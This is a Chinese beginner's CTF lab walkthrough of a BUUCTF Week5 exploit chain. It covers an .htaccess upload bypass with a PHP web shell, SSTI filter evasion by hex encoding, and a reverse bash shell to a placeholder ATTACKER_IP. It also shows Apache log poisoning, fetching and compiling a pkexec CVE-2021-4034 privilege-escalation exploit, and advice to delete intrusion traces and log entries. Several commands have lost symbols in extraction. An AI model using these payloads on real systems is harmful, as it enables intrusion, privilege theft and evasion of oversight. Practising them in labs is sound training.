当前位置: 首页 > article >正文

新手也能看懂的CTF靶场通关笔记:从.htaccess上传到SUID提权,手把手复现BUUCTF Week5

新手也能看懂的CTF靶场通关笔记从.htaccess上传到SUID提权手把手复现BUUCTF Week5第一次接触CTF比赛时看到那些复杂的漏洞利用链总有种看天书的感觉。直到自己动手在虚拟机里复现了整个攻击流程才真正理解每个技术细节的奥妙。本文将用最直白的语言带你一步步还原BUUCTF Week5中的经典漏洞链——从看似无害的.htaccess文件上传到最终获取服务器最高权限的SUID提权。我们不会跳过任何理所当然的步骤每个命令都会解释清楚它的作用就像有位经验丰富的队友在你耳边耐心指导。1. 环境准备与基础概念在开始实战前我们需要搭建一个与比赛环境相似的靶场。推荐使用VirtualBox配合Vagrant快速部署Ubuntu 22.04环境这样既能隔离实验环境又方便随时重置系统。以下是基础配置步骤# 安装VirtualBox和Vagrant sudo apt update sudo apt install -y virtualbox vagrant # 创建靶机目录并初始化 mkdir buuctf-week5 cd buuctf-week5 vagrant init ubuntu/jammy64 vagrant up vagrant ssh为什么选择Ubuntu 22.04因为这个LTS版本长期维护且软件包较新能更好复现现代CTF场景。接下来安装必要的服务组件# 安装Apache、PHP和相关组件 sudo apt install -y apache2 php libapache2-mod-php \ php-curl php-gd php-mbstring php-xml php-zip注意实际比赛环境可能使用特定PHP版本若遇到语法差异可尝试切换版本sudo apt install php7.4 sudo a2dismod php8.1 sudo a2enmod php7.4理解几个关键术语将帮助后续操作.htaccessApache服务器的分布式配置文件可覆盖主配置SSTIServer-Side Template Injection服务端模板注入漏洞SUIDSet User ID特殊文件权限允许以所有者身份执行2. .htaccess文件上传漏洞实战比赛中的第一个突破口往往是最容易被忽视的地方。这次的目标网站存在文件上传功能但限制了可上传的文件类型。常规绕过方法失效后.htaccess成了突破口。2.1 制作恶意.htaccess文件创建一个文本文件并写入以下内容FilesMatch shell.jpg SetHandler application/x-httpd-php /FilesMatch这个配置会让Apache将所有名为shell.jpg的文件当作PHP脚本解析。用十六进制编辑器查看文件头可以理解其工作原理xxd -g 1 .htaccess 00000000: 3c 46 69 6c 65 73 4d 61 74 63 68 20 22 73 68 65 FilesMatch she 00000010: 6c 6c 2e 6a 70 67 22 3e 0a 20 20 20 20 53 65 74 ll.jpg. Set 00000020: 48 61 6e 64 6c 65 72 20 61 70 70 6c 69 63 61 74 Handler applicat 00000030: 69 6f 6e 2f 78 2d 68 74 74 70 64 2d 70 68 70 0a ion/x-httpd-php. 00000040: 3c 2f 46 69 6c 65 73 4d 61 74 63 68 3e 0a /FilesMatch.2.2 上传与验证使用Burp Suite拦截上传请求修改Content-Type为text/plain。上传成功后再上传一个包含PHP代码的jpg文件?php system($_GET[cmd]); ?访问这个jpg文件时添加URL参数?cmdid如果返回当前用户信息说明漏洞利用成功。常见问题排查问题现象可能原因解决方案500内部错误Apache配置限制检查AllowOverride设置文件被删除安全防护扫描尝试使用.htpasswd等变体无执行效果文件路径错误确认上传目录有执行权限3. SSTI十六进制绕过技巧获得初步立足点后我们在网站搜索功能发现了疑似模板注入点。但常规测试字符被过滤这时需要十六进制编码绕过。3.1 识别SSTI漏洞先测试基础注入语法原始输入被过滤{{7*7}} → 返回49 → 存在SSTI但直接使用{{config}}等敏感操作会被拦截。通过十六进制编码可以绕过# 将payload转换为十六进制 {{config}}.encode(hex) # 得到7b7b636f6e6669677d7d在注入点输入\x7b\x7b\x63\x6f\x6e\x66\x69\x67\x7d\x7d3.2 利用SSTI获取Shell成功绕过过滤后构造反向Shell连接{% for x in ().__class__.__base__.__subclasses__() %} {% if Popen in x.__name__ %} {{ x([/bin/bash,-c,bash -i /dev/tcp/ATTACKER_IP/4444 01],stdout-1).communicate() }} {% endif %} {% endfor %}将上述代码转换为十六进制后分段注入。在攻击机监听nc -lvnp 4444提示如果网络限制导致反向Shell失败可尝试用Python创建简易HTTP服务器传输文件python3 -m http.server 80004. 权限提升从www-data到root拿到普通用户权限后我们开始寻找提权路径。首先收集系统信息# 查看内核版本 uname -a # 查找SUID文件 find / -perm -4000 -type f 2/dev/null # 检查可写目录 find / -writable 2/dev/null | grep -v proc4.1 利用Apache日志污染当常规SUID提权路径被封堵时可以尝试通过污染Apache日志执行代码# 定位日志路径 ps aux | grep apache cat /etc/apache2/envvars | grep LOG # 在User-Agent中注入PHP代码 curl -A ?php system(id); ? http://localhost # 包含日志文件执行 php -r include(/var/log/apache2/access.log);4.2 最终SUID提权发现系统安装了较旧版本的pkexec存在已知漏洞# 下载漏洞利用代码 wget http://example.com/CVE-2021-4034.c -O /tmp/pwn.c gcc /tmp/pwn.c -o /tmp/pwn # 执行提权 /tmp/pwn whoami # 现在应该是root如果编译环境缺失可以尝试预编译的二进制文件。以下是常见SUID提权目标对比程序名称利用难度影响范围修复方案pkexec低Polkit 0.105更新到最新版passwd中配置错误修正权限mount高特定文件系统禁用SUID5. 痕迹清理与防御建议完成挑战后别忘了清理入侵痕迹。删除创建的.htaccess文件、Web Shell和日志中的敏感条目。对于防御方建议禁用不必要的.htaccess覆盖功能对上传文件进行内容检测而非仅依赖扩展名定期更新系统组件修补已知漏洞使用最小权限原则运行服务最后分享一个实用技巧在虚拟机中为每个实验创建快照这样可以在不同阶段自由回溯而不用每次都从头搭建环境。

相关文章:

新手也能看懂的CTF靶场通关笔记:从.htaccess上传到SUID提权,手把手复现BUUCTF Week5

新手也能看懂的CTF靶场通关笔记:从.htaccess上传到SUID提权,手把手复现BUUCTF Week5 第一次接触CTF比赛时,看到那些复杂的漏洞利用链总有种"看天书"的感觉。直到自己动手在虚拟机里复现了整个攻击流程,才真正理解每个技…...

WebSocket 库存实时监控实战(Java 服务端 + 前端)

目录 一、技术选型 二、搭建 Spring Boot 服务端 1. 创建项目 & 引入依赖 2. WebSocket 配置类 3. 库存实体类(库存 预警规则) 4. WebSocket 服务端核心代码 5. 提供接口:手动修改库存并推送 6. 启动类 三、前端页面&#xff0…...

别再问客服了!手把手教你用VNC在AutoDL GPU服务器上跑起你的第一个GUI程序

云端GPU服务器VNC实战:从零部署GUI开发环境全指南 租用云GPU服务器进行深度学习训练已成为算法工程师的常态,但当代码涉及图形界面时,许多开发者会在cv2.imshow()或PyQt窗口弹出的环节卡壳。本文将基于AutoDL平台,详解如何通过Tur…...

C++学习笔记17:析构函数

目录 一、什么是析构函数? 二、析构函数写法 三、析构函数的特点 四、析构函数什么时候调用? 五、析构函数不是销毁对象本身 六、为什么需要析构函数? 七、用析构函数释放动态内存 八、析构函数的调用顺序 九、析构函数和构造函数的…...

不止于解题:聊聊猪圈密码、圣堂武士密码和标准银河字母背后的历史与趣闻

不止于解题:猪圈密码、圣堂武士密码与标准银河字母的文化考古 当你在CTF竞赛中第一次遇到那些神秘的几何符号时,是否曾好奇过这些图形背后的故事?从共济会的秘密集会到《我的世界》游戏中的彩蛋,图形密码早已超越了单纯的加密工具…...

RimWorld模组管理终极指南:3步掌握RimSort智能排序,告别游戏崩溃烦恼

RimWorld模组管理终极指南:3步掌握RimSort智能排序,告别游戏崩溃烦恼 【免费下载链接】RimSort RimSort is an open source mod manager for the video game RimWorld. There is support for Linux, Mac, and Windows, built from the ground up to be a…...

AI Agent到底是什么

AI Agent 到底是什么?看完我悟了 今天看了几个产品,跟 AI 聊了聊,突然对 AI Agent 有了个很朴素的理解。AI Agent 不神秘 很多人觉得 AI Agent 是什么高深的东西,只有大厂才能搞。 但我现在的理解就一句话:❝ 「AI Age…...

告别手动填表!用Python脚本5分钟搞定DSSAT模型批量模拟(附源码)

Python自动化DSSAT模型:从Excel到批量模拟的高效科研实践 在农业科研和气候情景分析中,DSSAT模型作为全球主流的作物生长模拟工具,其价值早已被广泛认可。但真正使用过它的研究者都深有体会:当面对数十种管理方案、上百个气象场景…...

集成测试实战

软件测试理论:https://blog.csdn.net/2402_88266590/article/details/160966638?spm1011.2415.3001.5331 单元测试实战:https://blog.csdn.net/2402_88266590/article/details/161017518?spm1001.2014.3001.5502 下面就开始进入集成测试的学习吧&…...

从“让大模型回答问题“到智能决策:LangGraph 构建 AI Agent 的核心奥秘

本文深入解析了 AI Agent 的核心价值在于判断与决策,而非简单回答问题。LangGraph 作为图式工作流框架,通过 State(共享状态)、Node(处理节点)、Router(决策分支)的设计,…...

Android Studio中文界面汉化教程:3步实现母语开发环境

Android Studio中文界面汉化教程:3步实现母语开发环境 【免费下载链接】AndroidStudioChineseLanguagePack AndroidStudio中文插件(官方修改版本) 项目地址: https://gitcode.com/gh_mirrors/an/AndroidStudioChineseLanguagePack 还在为Android …...

在Hermes Agent中自定义Provider接入Taotoken服务

🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 在Hermes Agent中自定义Provider接入Taotoken服务 对于使用Hermes Agent进行AI应用开发的团队而言,能够灵活接入不同的…...

工业控制新方案:电容HMI与字符LCD组合应用实战

1. 项目概述:当经典LCD遇上电容触控,工业控制的新解法最近在做一个产线设备升级的项目,客户对操作界面的要求突然拔高了不少:既要能看清复杂的工艺参数,又要求操作像手机一样流畅,还得扛得住车间里的油污、…...

Flowframes:AI视频插帧工具让你的视频流畅度翻倍

Flowframes:AI视频插帧工具让你的视频流畅度翻倍 【免费下载链接】flowframes Flowframes Windows GUI for video interpolation using DAIN (NCNN) or RIFE (CUDA/NCNN) 项目地址: https://gitcode.com/gh_mirrors/fl/flowframes 你是否曾因视频卡顿而烦恼&…...

基于ARM核心板的T-BOX系统设计:从硬件选型到软件实现

1. 项目概述与核心价值最近几年,车联网的概念已经从实验室和展会,实实在在地走进了我们的日常生活。作为一名在嵌入式领域摸爬滚打了十几年的工程师,我亲眼见证了从简单的GPS定位模块,到如今功能高度集成的车载T-BOX(T…...

2026 论文双检突围:9 款查重降重降 AIGC 工具硬核横评,Paperxie 领跑全场景通关

paperxie-免费查重复率aigc检测/开题报告/毕业论文/智能排版/文献综述/AI PPThttps://www.paperxie.cn/weight?type1https://www.paperxie.cn/weight?type1 毕业季论文查重飘红、AIGC 率爆表,已成为无数本科生与研究生的 “双重噩梦”。2026 年知网、维普全面升级…...

手把手教你搞定Windows下的NAMD和VMD安装(附最新版下载与注册避坑指南)

Windows平台NAMD与VMD安装全攻略:从零开始玩转分子动力学模拟 当第一次接触分子动力学模拟时,软件安装往往是新手面临的第一个挑战。NAMD和VMD作为该领域最常用的工具组合,它们的安装过程看似简单,实则暗藏诸多细节。本文将带你从…...

怎么将5v电升到12v?

开关电源BOOST升压原理首先,12v降到5v,我们可以通过串联一个电阻或者电感,利用串联分压定理,就能实现。那如何把5v升到12v呢?交流电我们可以通过变压器实现。那直流电呢?(开关电源BOOST升压原理…...

从查重到降 AIGC,2026 年 9 款论文工具横评:Paperxie 领衔,谁才是本科生的 “熬夜救星”?

paperxie-免费查重复率aigc检测/开题报告/毕业论文/智能排版/文献综述/AI PPThttps://www.paperxie.cn/weight?type1https://www.paperxie.cn/weight?type1 每到毕业季,论文查重飘红、AIGC 检测亮红灯,几乎是所有本科生的共同噩梦。从初稿到定稿&#…...

从老式万用表到精密测量:双积分ADC如何用‘慢’换来‘准’?选型避坑指南

从老式万用表到精密测量:双积分ADC如何用‘慢’换来‘准’?选型避坑指南 在仪器仪表和传感器信号调理领域,精度与速度的权衡一直是硬件工程师面临的核心挑战。当我们处理温度、压力或称重传感器等低频高精度信号时,传统的SAR和Σ…...

【例题2】The XOR Largest Pair(信息学奥赛一本通- P1472)

【题目描述】在给定的 N 个整数 A1,A2,…,AN 中选出两个进行异或运算,得到的结果最大是多少?【输入】第一行一个整数 N。第二行 N 个整数 Ai​​ 。【输出】一个整数表示答案。【输入样例】5 2 9 5 7 0【输出样例】14【提示】对于 100% 的数据&#xff0…...

3分钟解锁Translumo:Windows平台屏幕实时翻译的终极解决方案

3分钟解锁Translumo:Windows平台屏幕实时翻译的终极解决方案 【免费下载链接】Translumo Advanced real-time screen translator for games, hardcoded subtitles in videos, static text and etc. 项目地址: https://gitcode.com/gh_mirrors/tr/Translumo 还…...

CVAT教程

ubuntu服务器部署 https://blog.csdn.net/qq_48187848/article/details/146040443?spm1001.2101.3001.6661.1&utm_mediumdistribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EBlogOpenSearchComplete%7ERate-1-146040443-blog-145734432.235%5Ev43%5Epc_blog_bottom…...

视觉伺服visual servoing

模拟视觉反馈(图像 X/Y 偏差)自动控制机械臂末端向目标移动闭环控制,偏差越小速度越低无硬件相机也能运行(内置虚拟视觉信号)视觉伺服 Visual Servoing 示例代码cpp运行/********************************************…...

20+终极Obsidian模板:简单快速构建你的卡片盒笔记系统

20终极Obsidian模板:简单快速构建你的卡片盒笔记系统 【免费下载链接】Obsidian-Templates A repository containing templates and scripts for #Obsidian to support the #Zettelkasten method for note-taking. 项目地址: https://gitcode.com/gh_mirrors/ob/O…...

Beyond Compare 5密钥生成终极指南:从激活失败到完全使用

Beyond Compare 5密钥生成终极指南:从激活失败到完全使用 【免费下载链接】BCompare_Keygen Keygen for BCompare 5 项目地址: https://gitcode.com/gh_mirrors/bc/BCompare_Keygen 你是否也遇到过Beyond Compare 5弹出"评估模式错误"的困扰&#…...

告别Unity WebGL的模糊UI:用Vue3重构前端界面,手把手教你实现双向通信

Unity WebGL与Vue3的完美联姻:打造高清交互界面的实战指南 1. 为什么需要重构Unity WebGL的UI系统? 许多Unity开发者都曾经历过这样的困境:当我们将精心制作的3D项目发布为WebGL版本时,原生UGUI在浏览器中的表现往往不尽如人意。模…...

零基础转专业计算机机试,我用这5道题帮你摸清浙工大出题套路(附C++代码)

零基础转专业计算机机试:5道真题破解浙工大出题密码(附C实战代码) 第一次面对计算机转专业机试时,我盯着屏幕上闪烁的光标,手指悬在键盘上方却不知从何下手。那种面对陌生题型的茫然感,至今记忆犹新。现在作…...

麒麟KylinOS 2303系统管理员必备:用模板为新用户批量配置统一电源策略

麒麟KylinOS 2303系统管理员实战:批量配置用户电源策略的模板化方案 在企业办公环境或学校机房中,麒麟KylinOS系统管理员经常面临统一管理多台电脑电源策略的需求。传统逐台配置的方式效率低下,而通过/etc/skel/用户模板目录的机制&#xff0…...

保姆级教程:用STM32F103C8T6和MAX485芯片实现稳定的一主多从RS485通讯(附完整代码)

STM32F103C8T6与MAX485构建工业级RS485总线系统实战指南 在工业自动化领域,稳定可靠的通信系统如同神经脉络般重要。想象一下,当您需要在一个大型温室中部署数十个温湿度传感器,或者在一个工厂车间监控多台设备的运行状态时,点对点…...